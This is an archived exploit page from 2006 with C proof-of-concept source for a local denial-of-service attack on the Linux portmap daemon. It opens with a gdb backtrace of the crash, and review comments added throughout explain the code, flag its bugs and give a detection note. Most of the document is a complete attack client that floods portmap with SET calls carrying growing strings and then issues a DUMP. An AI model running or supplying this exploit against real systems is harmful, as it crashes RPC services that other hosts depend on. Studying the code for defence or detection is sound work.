portmap 5 beta (Set/Dump) Local Denial of Service Exploit
来源:fbossi[at]netcomm[dot]com[dot]ar 作者:fbossi 发布时间:2006-05-23  

/////////////////////////////////////
// portmap Set+Dump Local DoS - PoC
////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar
////////////////////////////////////

// Tested on Linux with version 5

// USE DEBUGGING MODE
/////////////////////

// (gdb) backtrace
// #0 0xffffe410 in __kernel_vsyscall ()
// #1 0xb7f21343 in write () from /lib/tls/libc.so.6
// #2 0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6
// #3 0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6
// #4 0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6
// #5 0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6
// #6 0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6
// #7 0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6
// #8 0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6
// #9 0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6
// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6
// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6
// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6
// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6
// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515
// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6
// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6
// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6
// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303

#include <stdio.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/pmap_prot.h>

// Local host name buffer; main() fills it with gethostname() and passes it
// to authunix_create() as the machine name of the AUTH_UNIX credential.
char myhost[256];

// Number of procedure-1 calls main() issues. Defaults to 600; main() lets
// argv[2] override it and caps it at 1024.
int len = 600;

// Loop counter used by main().
int i;

// Proof-of-concept client for the portmap "Set+Dump" local denial of service
// named in the file header (reported there against portmap version 5 on Linux).
//
// Usage: <prog> <hostname> [count]
//   argv[1]  host running portmap, resolved with gethostbyname().
//   argv[2]  optional number of procedure-1 calls; defaults to the global
//            `len` (600) and is capped at 1024.
//
// Flow: create a TCP RPC client for program 100000 version 2 (PMAPPROG /
// PMAPVERS in <rpc/pmap_prot.h>), attach AUTH_UNIX credentials, send `len`
// calls to procedure 1 (PMAPPROC_SET) with a string argument that grows by one
// byte per call, then send one call to procedure 4 (PMAPPROC_DUMP).
// The gdb backtrace in the file header shows portmap inside reg_service() ->
// svc_sendreply() -> xdr_pmaplist() -> write(); presumably it was captured
// while the daemon was serving that final DUMP -- confirm.
//
// Detection note: what this client puts on the wire is several hundred SET
// calls on a single TCP connection followed by one DUMP. The page names no
// fixed version or advisory id; check the portmap/rpcbind vendor changelog.
//
// NOTE(review): the return type is implicit int, and exit/atoi/malloc,
// memset/memcpy/strlen/bcopy and close/gethostname are used although
// <stdlib.h>, <string.h>/<strings.h> and <unistd.h> are not in the include list.
main(int argc, char *argv[]) {

// A target host name is mandatory.
if (argc < 2) {
printf("usage:%s <hostname>\n",argv[0]);
exit(1);
}

// Optional call count. atoi() reports no errors; a non-numeric argument gives 0
// and a negative one makes the loop below run zero times.
if (argc >2) { len=atoi(argv[2]); }
// Cap at 1024, the size of the `data` buffer allocated below.
if (len > 1024) { len=1024; }

// RPC program 100000 / version 2: the portmapper itself (PMAPPROG, PMAPVERS).
unsigned long PROGRAM=100000;
unsigned long VERSION=2;

struct hostent *hp;
struct sockaddr_in server_addr;
// RPC_ANYSOCK asks clnttcp_create() to open the socket itself.
int sock = RPC_ANYSOCK;
register CLIENT *client;
// NOTE(review): clnt_stat is declared but never assigned; the clnt_call()
// results below are discarded.
enum clnt_stat clnt_stat;
// Per-call timeout handed to clnt_call(): 40 seconds.
struct timeval timeout;
timeout.tv_sec = 40;
timeout.tv_usec = 0;


if ((hp = gethostbyname(argv[1])) == NULL) {
printf("Can't resolve %s\n",argv[1]);
// NOTE(review): exits with status 0 although resolution failed.
exit(0);
}

// Local host name for the AUTH_UNIX credential; the return value is not checked.
gethostname(myhost,255);
// Copy the first resolved address into the target sockaddr.
// NOTE(review): server_addr is never zeroed and hp->h_length is not checked
// against sizeof server_addr.sin_addr.
bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length);
server_addr.sin_family = AF_INET;
// Port 0 leaves the port lookup to clnttcp_create().
server_addr.sin_port = 0;

// TCP client handle with 1024-byte send and receive buffers.
if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) {
clnt_pcreateerror("clnttcp_create");
// NOTE(review): exits with status 0 although client creation failed.
exit(0);
}

// AUTH_UNIX credential: local host name, uid 0, gid 0, no supplementary groups.
// NOTE(review): the default cl_auth is overwritten without auth_destroy(), and
// the authunix_create() result is not checked.
client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL);

// Argument buffer for the calls below.
// NOTE(review): the malloc() result is unchecked, and strlen() runs on freshly
// allocated, uninitialized memory -- undefined behaviour; the memset() clears
// only up to whatever NUL byte happens to be found, so the buffer is not
// guaranteed to be zeroed.
char *data = (char *) malloc(1024);
memset(data,0x0,strlen(data));

// Result buffer; same uninitialized-strlen() problem as `data`.
char *response = (char *) malloc(1024);
memset(response,0x0,strlen(response));

// Each pass appends one '1' to `data` and sends it to procedure 1 (PMAPPROC_SET).
// NOTE(review): no terminator is written after the appended byte, so strlen()
// relies on the following bytes being zero, which the memset() above does not
// guarantee; with len == 1024 the 1024-byte buffer has no room left for a NUL.
// NOTE(review): the argument is encoded as an XDR string (xdr_wrapstring), not
// as the struct pmap (xdr_pmap) that <rpc/pmap_prot.h> documents for SET; how
// portmap interprets it is not shown on this page.
// NOTE(review): the result pointer is passed as `response`, not `&response` as
// is done for `data`; xdr_wrapstring() takes a char ** -- confirm.
for (i = 0 ; i < len ; i++) {
memcpy(data+strlen(data),"1",1);
clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout);
}

// One final call to procedure 4 (PMAPPROC_DUMP), which asks portmap for its
// mapping list; the reply is decoded with xdr_wrapstring, not xdr_pmaplist.
clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout);

// Tear down the client handle, close the socket and free both buffers.
// NOTE(review): the credential created by authunix_create() is not destroyed.
clnt_destroy(client);
close(sock);
free(data);
free(response);
exit(0);
}



 